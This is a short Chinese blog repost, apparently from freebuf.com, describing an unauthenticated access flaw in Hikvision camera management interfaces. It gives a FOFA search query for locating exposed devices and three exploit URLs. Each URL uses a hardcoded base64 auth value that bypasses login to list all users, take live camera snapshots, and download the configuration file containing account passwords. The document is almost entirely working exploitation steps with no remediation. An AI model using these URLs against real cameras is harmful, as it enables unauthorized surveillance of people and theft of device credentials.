一、漏洞概述:
杭州海康威视系统技术有限公司摄像头管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。
fofa网址:fofa.so
fofa搜索:app=”HIKVISION-视频监控”
二、漏洞利用:
1、利用路径:
http://your-ip/Security/users?auth=YWRtaW46MTEK
YWRtaW46MTEKadmin:11的base64编码
检索所有用户及其角色的列表。
2、利用路径:
http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK
获取监控快照,不进行身份验证。
3、利用路径:
http://your-ip/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头配置账号密码文件。
来源:freebuf.com 2021-04-09 00:04:39 by: fswyfswy
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册